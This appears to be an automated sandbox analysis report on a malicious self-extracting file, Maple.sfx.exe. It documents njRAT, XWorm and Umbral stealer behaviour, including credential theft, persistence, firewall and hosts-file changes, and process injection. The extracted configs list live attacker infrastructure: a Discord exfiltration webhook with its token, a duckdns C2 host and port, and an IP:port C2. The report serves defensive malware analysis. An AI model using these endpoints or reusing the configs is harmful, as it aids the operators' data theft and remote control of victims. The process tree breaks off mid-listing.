njrat | 5db2db5c8a468b925bdf13bb3f11244af1c7dbc86a6f5727b724bf1961c5e5e2

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
15-12-2024 05:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Maple.sfx.exe
Size

49.9MB
MD5

b6eb7b6c81c32e94112f00a4bd7fbc80
SHA1

328d30384ac99a4b24ebb78fe1ccde41444191a7
SHA256

5db2db5c8a468b925bdf13bb3f11244af1c7dbc86a6f5727b724bf1961c5e5e2
SHA512

94e1d9a2899f7d2a210dc76615923be8475a8f89c9484d56f3ee2c9c28cf75a13051df8dd068835261bcab62e12a4c57bbb41efa0b7783b8b1138b314649f003
SSDEEP

1572864:wOyrjq1zExjMkfCfYFvWExN+ZJupU485C3Kc68:wOscE9Mkfnb1pUTC3P68

Score

10^/10

njrat umbral xworm hacked discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1260642804414156891/hKfLDYiwORnJS0u7NEs9WPwqTyOYiJyHsbqndD7MezE-rhVSLHFDRhBZ_hNqb3v9ZoeE

Extracted

Family

xworm

Version

5.0

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes

Install_directory
%AppData%
install_file
Ondrive.exe

aes.plain

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

147.185.221.20:49236

Mutex

6a8a3b6e5450a823d542e748a454aa4c

Attributes

reg_key
6a8a3b6e5450a823d542e748a454aa4c
splitter
|'|'|

Signatures

Detect Umbral payload 13 IoCs

resource	yara_rule
behavioral1/files/0x0007000000016d31-31.dat	family_umbral
behavioral1/memory/1740-40-0x00000000000F0000-0x0000000000130000-memory.dmp	family_umbral
behavioral1/memory/1604-161-0x00000000013A0000-0x00000000013E0000-memory.dmp	family_umbral
behavioral1/memory/2560-210-0x0000000000010000-0x0000000000050000-memory.dmp	family_umbral
behavioral1/memory/2480-248-0x00000000001A0000-0x00000000001E0000-memory.dmp	family_umbral
behavioral1/memory/1716-283-0x0000000000B60000-0x0000000000BA0000-memory.dmp	family_umbral
behavioral1/memory/2400-318-0x0000000000E80000-0x0000000000EC0000-memory.dmp	family_umbral
behavioral1/memory/2208-389-0x00000000010E0000-0x0000000001120000-memory.dmp	family_umbral
behavioral1/memory/2320-458-0x00000000003B0000-0x00000000003F0000-memory.dmp	family_umbral
behavioral1/memory/1248-561-0x0000000001270000-0x00000000012B0000-memory.dmp	family_umbral
behavioral1/memory/2416-665-0x0000000000340000-0x0000000000380000-memory.dmp	family_umbral
behavioral1/memory/272-700-0x0000000000900000-0x0000000000940000-memory.dmp	family_umbral
behavioral1/memory/2800-735-0x0000000000E40000-0x0000000000E80000-memory.dmp	family_umbral

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0005000000019282-48.dat	family_xworm
behavioral1/memory/2068-51-0x0000000000D50000-0x0000000000D60000-memory.dmp	family_xworm
behavioral1/memory/1796-320-0x0000000000920000-0x0000000000930000-memory.dmp	family_xworm
behavioral1/memory/1712-630-0x00000000009A0000-0x00000000009B0000-memory.dmp	family_xworm

Njrat family
njrat
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
820	powershell.exe
2524	powershell.exe
1268	powershell.exe
2516	powershell.exe
1280	powershell.exe
2344	powershell.exe
2624	powershell.exe
1220	powershell.exe
2244	powershell.exe
1928	powershell.exe
572	powershell.exe
3000	powershell.exe
1812	powershell.exe
3028	powershell.exe
2300	powershell.exe
2580	powershell.exe
1452	powershell.exe
3060	powershell.exe
2896	powershell.exe
1960	powershell.exe
2036	powershell.exe
2624	powershell.exe
2136	powershell.exe
1176	powershell.exe
2944	powershell.exe
1532	powershell.exe
2904	powershell.exe
2992	powershell.exe
2404	powershell.exe
1288	powershell.exe
2032	powershell.exe
2972	powershell.exe
2488	powershell.exe
1536	powershell.exe
2172	powershell.exe
2632	powershell.exe
1540	powershell.exe
2812	powershell.exe
2120	powershell.exe
2792	powershell.exe
1764	powershell.exe
2840	powershell.exe
2836	powershell.exe
2824	powershell.exe
1892	powershell.exe
2788	powershell.exe
716	powershell.exe
2136	powershell.exe
2656	powershell.exe
1156	powershell.exe
2108	powershell.exe
2768	powershell.exe
1248	powershell.exe
2588	powershell.exe
1456	powershell.exe
2748	powershell.exe
1176	powershell.exe
3024	powershell.exe
2328	powershell.exe
536	powershell.exe
1900	powershell.exe
2260	powershell.exe
3032	powershell.exe
2040	powershell.exe

Drops file in Drivers directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Maple.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1752	netsh.exe

Executes dropped EXE 64 IoCs

pid	Process
2580	loader.exe
792	Server.exe
1740	Maple.exe
1920	Server.exe
2068	conhost.exe
2124	loader.exe
2800	Server.exe
2752	Maple.exe
2080	loader.exe
2480	Server.exe
1912	conhost.exe
3008	Maple.exe
888	Server.exe
2332	loader.exe
1996	Server.exe
1684	conhost.exe
2988	Server.exe
2512	Maple.exe
1556	Server.exe
1088	conhost.exe
468	loader.exe
1484	server.exe
1460	Server.exe
1604	Maple.exe
1196	loader.exe
2744	Server.exe
2212	Maple.exe
2052	loader.exe
716	Maple.exe
2192	Server.exe
2416	loader.exe
2956	Server.exe
2560	Maple.exe
2524	loader.exe
2668	Server.exe
1284	Maple.exe
2128	loader.exe
1760	Server.exe
2924	Maple.exe
1716	loader.exe
1608	Server.exe
2480	Maple.exe
2976	loader.exe
3060	Server.exe
604	Maple.exe
1964	loader.exe
2332	Server.exe
2908	Maple.exe
2516	loader.exe
2324	Server.exe
1716	Maple.exe
1220	loader.exe
1620	Server.exe
2944	Maple.exe
2792	loader.exe
2860	Server.exe
2260	Maple.exe
2360	loader.exe
3040	Server.exe
2400	Maple.exe
2492	loader.exe
1796	Ondrive.exe
1424	Server.exe
1556	Maple.exe

Loads dropped DLL 5 IoCs

pid	Process
2736	Maple.sfx.exe
2736	Maple.sfx.exe
2736	Maple.sfx.exe
2736	Maple.sfx.exe
1920	Server.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe\" .."	Server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe\" .."	Server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 40 IoCs

Web Service

T1102

flow	ioc
20	discord.com
158	discord.com
37	discord.com
53	discord.com
107	discord.com
116	discord.com
178	discord.com
141	discord.com
142	discord.com
159	discord.com
63	discord.com
64	discord.com
72	discord.com
98	discord.com
106	discord.com
10	discord.com
88	discord.com
150	discord.com
124	discord.com
132	discord.com
177	discord.com
9	discord.com
44	discord.com
71	discord.com
99	discord.com
115	discord.com
45	discord.com
89	discord.com
131	discord.com
166	discord.com
28	discord.com
29	discord.com
36	discord.com
79	discord.com
80	discord.com
18	discord.com
54	discord.com
123	discord.com
151	discord.com
167	discord.com

Looks up external IP address via web service 21 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	ip-api.com
76	ip-api.com
93	ip-api.com
120	ip-api.com
155	ip-api.com
6	ip-api.com
41	ip-api.com
60	ip-api.com
85	ip-api.com
103	ip-api.com
25	ip-api.com
33	ip-api.com
147	ip-api.com
174	ip-api.com
14	ip-api.com
111	ip-api.com
138	ip-api.com
163	ip-api.com
182	ip-api.com
68	ip-api.com
128	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maple.sfx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 42 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
432	cmd.exe
3040	cmd.exe
2488	PING.EXE
1856	PING.EXE
2424	PING.EXE
1916	cmd.exe
624	cmd.exe
3000	PING.EXE
1872	cmd.exe
568	cmd.exe
2956	cmd.exe
2748	PING.EXE
1888	cmd.exe
1156	PING.EXE
1536	PING.EXE
2020	PING.EXE
912	PING.EXE
2468	PING.EXE
1432	cmd.exe
2172	cmd.exe
1296	PING.EXE
2952	cmd.exe
1608	PING.EXE
2460	cmd.exe
2176	cmd.exe
2360	PING.EXE
1860	cmd.exe
1008	PING.EXE
2584	cmd.exe
2188	PING.EXE
2748	cmd.exe
1420	PING.EXE
820	PING.EXE
2992	PING.EXE
2152	cmd.exe
2284	cmd.exe
2412	cmd.exe
2572	PING.EXE
2060	PING.EXE
3000	cmd.exe
968	PING.EXE
2040	cmd.exe

Detects videocard installed 1 TTPs 21 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2936	wmic.exe
2564	wmic.exe
2604	wmic.exe
1276	wmic.exe
1220	wmic.exe
1644	wmic.exe
2620	wmic.exe
2332	wmic.exe
2120	wmic.exe
2360	wmic.exe
2204	wmic.exe
1888	wmic.exe
1996	wmic.exe
1668	wmic.exe
2420	wmic.exe
1484	wmic.exe
2360	wmic.exe
2708	wmic.exe
840	wmic.exe
2612	wmic.exe
2108	wmic.exe

Runs ping.exe 1 TTPs 21 IoCs

Remote System Discovery

T1018

pid	Process
2060	PING.EXE
1608	PING.EXE
1296	PING.EXE
1856	PING.EXE
912	PING.EXE
2572	PING.EXE
2424	PING.EXE
2360	PING.EXE
2468	PING.EXE
2488	PING.EXE
1156	PING.EXE
3000	PING.EXE
968	PING.EXE
1420	PING.EXE
820	PING.EXE
2992	PING.EXE
2188	PING.EXE
1008	PING.EXE
2748	PING.EXE
1536	PING.EXE
2020	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1588	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2068	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2292	powershell.exe
2632	powershell.exe
2176	powershell.exe
1740	Maple.exe
1480	powershell.exe
2040	powershell.exe
3060	powershell.exe
2836	powershell.exe
484	powershell.exe
2300	powershell.exe
1604	Maple.exe
1940	powershell.exe
572	powershell.exe
2344	powershell.exe
2200	powershell.exe
1248	powershell.exe
2560	Maple.exe
2060	powershell.exe
2896	powershell.exe
2588	powershell.exe
2788	powershell.exe
2812	powershell.exe
2480	Maple.exe
2580	powershell.exe
536	powershell.exe
2136	powershell.exe
704	powershell.exe
2172	powershell.exe
1716	Maple.exe
2924	powershell.exe
1176	powershell.exe
2824	powershell.exe
2972	powershell.exe
2136	powershell.exe
2400	Maple.exe
1932	powershell.exe
2120	powershell.exe
1900	powershell.exe
1600	powershell.exe
2656	powershell.exe
1748	Maple.exe
1136	powershell.exe
1156	powershell.exe
2032	powershell.exe
2976	powershell.exe
1892	powershell.exe
2208	Maple.exe
1484	powershell.exe
2904	powershell.exe
2788	powershell.exe
2004	powershell.exe
1456	powershell.exe
2104	Maple.exe
3068	powershell.exe
3000	powershell.exe
2992	powershell.exe
2152	powershell.exe
2748	powershell.exe
2320	Maple.exe
1796	powershell.exe
2972	powershell.exe
2524	powershell.exe
2140	powershell.exe
2580	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2068	conhost.exe
Token: SeDebugPrivilege	1740	Maple.exe
Token: SeDebugPrivilege	1912	conhost.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeIncreaseQuotaPrivilege	2128	wmic.exe
Token: SeSecurityPrivilege	2128	wmic.exe
Token: SeTakeOwnershipPrivilege	2128	wmic.exe
Token: SeLoadDriverPrivilege	2128	wmic.exe
Token: SeSystemProfilePrivilege	2128	wmic.exe
Token: SeSystemtimePrivilege	2128	wmic.exe
Token: SeProfSingleProcessPrivilege	2128	wmic.exe
Token: SeIncBasePriorityPrivilege	2128	wmic.exe
Token: SeCreatePagefilePrivilege	2128	wmic.exe
Token: SeBackupPrivilege	2128	wmic.exe
Token: SeRestorePrivilege	2128	wmic.exe
Token: SeShutdownPrivilege	2128	wmic.exe
Token: SeDebugPrivilege	2128	wmic.exe
Token: SeSystemEnvironmentPrivilege	2128	wmic.exe
Token: SeRemoteShutdownPrivilege	2128	wmic.exe
Token: SeUndockPrivilege	2128	wmic.exe
Token: SeManageVolumePrivilege	2128	wmic.exe
Token: 33	2128	wmic.exe
Token: 34	2128	wmic.exe
Token: 35	2128	wmic.exe
Token: SeIncreaseQuotaPrivilege	2128	wmic.exe
Token: SeSecurityPrivilege	2128	wmic.exe
Token: SeTakeOwnershipPrivilege	2128	wmic.exe
Token: SeLoadDriverPrivilege	2128	wmic.exe
Token: SeSystemProfilePrivilege	2128	wmic.exe
Token: SeSystemtimePrivilege	2128	wmic.exe
Token: SeProfSingleProcessPrivilege	2128	wmic.exe
Token: SeIncBasePriorityPrivilege	2128	wmic.exe
Token: SeCreatePagefilePrivilege	2128	wmic.exe
Token: SeBackupPrivilege	2128	wmic.exe
Token: SeRestorePrivilege	2128	wmic.exe
Token: SeShutdownPrivilege	2128	wmic.exe
Token: SeDebugPrivilege	2128	wmic.exe
Token: SeSystemEnvironmentPrivilege	2128	wmic.exe
Token: SeRemoteShutdownPrivilege	2128	wmic.exe
Token: SeUndockPrivilege	2128	wmic.exe
Token: SeManageVolumePrivilege	2128	wmic.exe
Token: 33	2128	wmic.exe
Token: 34	2128	wmic.exe
Token: 35	2128	wmic.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	1684	conhost.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	484	powershell.exe
Token: SeIncreaseQuotaPrivilege	1248	wmic.exe
Token: SeSecurityPrivilege	1248	wmic.exe
Token: SeTakeOwnershipPrivilege	1248	wmic.exe
Token: SeLoadDriverPrivilege	1248	wmic.exe
Token: SeSystemProfilePrivilege	1248	wmic.exe
Token: SeSystemtimePrivilege	1248	wmic.exe
Token: SeProfSingleProcessPrivilege	1248	wmic.exe
Token: SeIncBasePriorityPrivilege	1248	wmic.exe
Token: SeCreatePagefilePrivilege	1248	wmic.exe
Token: SeBackupPrivilege	1248	wmic.exe
Token: SeRestorePrivilege	1248	wmic.exe
Token: SeShutdownPrivilege	1248	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 2580	2736	Maple.sfx.exe	30
PID 2736 wrote to memory of 2580	2736	Maple.sfx.exe	30
PID 2736 wrote to memory of 2580	2736	Maple.sfx.exe	30
PID 2736 wrote to memory of 2580	2736	Maple.sfx.exe	30
PID 2580 wrote to memory of 792	2580	loader.exe	31
PID 2580 wrote to memory of 792	2580	loader.exe	31
PID 2580 wrote to memory of 792	2580	loader.exe	31
PID 2580 wrote to memory of 1740	2580	loader.exe	32
PID 2580 wrote to memory of 1740	2580	loader.exe	32
PID 2580 wrote to memory of 1740	2580	loader.exe	32
PID 792 wrote to memory of 1920	792	Server.exe	33
PID 792 wrote to memory of 1920	792	Server.exe	33
PID 792 wrote to memory of 1920	792	Server.exe	33
PID 792 wrote to memory of 1920	792	Server.exe	33
PID 2580 wrote to memory of 2124	2580	loader.exe	34
PID 2580 wrote to memory of 2124	2580	loader.exe	34
PID 2580 wrote to memory of 2124	2580	loader.exe	34
PID 792 wrote to memory of 2068	792	Server.exe	35
PID 792 wrote to memory of 2068	792	Server.exe	35
PID 792 wrote to memory of 2068	792	Server.exe	35
PID 2124 wrote to memory of 2800	2124	loader.exe	36
PID 2124 wrote to memory of 2800	2124	loader.exe	36
PID 2124 wrote to memory of 2800	2124	loader.exe	36
PID 2124 wrote to memory of 2752	2124	loader.exe	37
PID 2124 wrote to memory of 2752	2124	loader.exe	37
PID 2124 wrote to memory of 2752	2124	loader.exe	37
PID 2124 wrote to memory of 2080	2124	loader.exe	38
PID 2124 wrote to memory of 2080	2124	loader.exe	38
PID 2124 wrote to memory of 2080	2124	loader.exe	38
PID 2800 wrote to memory of 2480	2800	Server.exe	39
PID 2800 wrote to memory of 2480	2800	Server.exe	39
PID 2800 wrote to memory of 2480	2800	Server.exe	39
PID 2800 wrote to memory of 2480	2800	Server.exe	39
PID 2800 wrote to memory of 1912	2800	Server.exe	40
PID 2800 wrote to memory of 1912	2800	Server.exe	40
PID 2800 wrote to memory of 1912	2800	Server.exe	40
PID 2068 wrote to memory of 2292	2068	conhost.exe	41
PID 2068 wrote to memory of 2292	2068	conhost.exe	41
PID 2068 wrote to memory of 2292	2068	conhost.exe	41
PID 2068 wrote to memory of 2632	2068	conhost.exe	43
PID 2068 wrote to memory of 2632	2068	conhost.exe	43
PID 2068 wrote to memory of 2632	2068	conhost.exe	43
PID 2068 wrote to memory of 2176	2068	conhost.exe	45
PID 2068 wrote to memory of 2176	2068	conhost.exe	45
PID 2068 wrote to memory of 2176	2068	conhost.exe	45
PID 1740 wrote to memory of 2128	1740	Maple.exe	47
PID 1740 wrote to memory of 2128	1740	Maple.exe	47
PID 1740 wrote to memory of 2128	1740	Maple.exe	47
PID 2068 wrote to memory of 1480	2068	conhost.exe	50
PID 2068 wrote to memory of 1480	2068	conhost.exe	50
PID 2068 wrote to memory of 1480	2068	conhost.exe	50
PID 1740 wrote to memory of 1992	1740	Maple.exe	52
PID 1740 wrote to memory of 1992	1740	Maple.exe	52
PID 1740 wrote to memory of 1992	1740	Maple.exe	52
PID 2080 wrote to memory of 888	2080	loader.exe	54
PID 2080 wrote to memory of 888	2080	loader.exe	54
PID 2080 wrote to memory of 888	2080	loader.exe	54
PID 2080 wrote to memory of 3008	2080	loader.exe	55
PID 2080 wrote to memory of 3008	2080	loader.exe	55
PID 2080 wrote to memory of 3008	2080	loader.exe	55
PID 2080 wrote to memory of 2332	2080	loader.exe	56
PID 2080 wrote to memory of 2332	2080	loader.exe	56
PID 2080 wrote to memory of 2332	2080	loader.exe	56
PID 1740 wrote to memory of 2040	1740	Maple.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 21 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2144	attrib.exe
2356	attrib.exe
1480	attrib.exe
1992	attrib.exe
2936	attrib.exe
1688	attrib.exe
2912	attrib.exe
968	attrib.exe
1588	attrib.exe
2016	attrib.exe
2644	attrib.exe
432	attrib.exe
1196	attrib.exe
2536	attrib.exe
2528	attrib.exe
2820	attrib.exe
2036	attrib.exe
2936	attrib.exe
2816	attrib.exe
584	attrib.exe
2104	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe
"C:\Users\Admin\AppData\Local\Temp\Maple.sfx.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:792
  - - C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1920
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1484
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
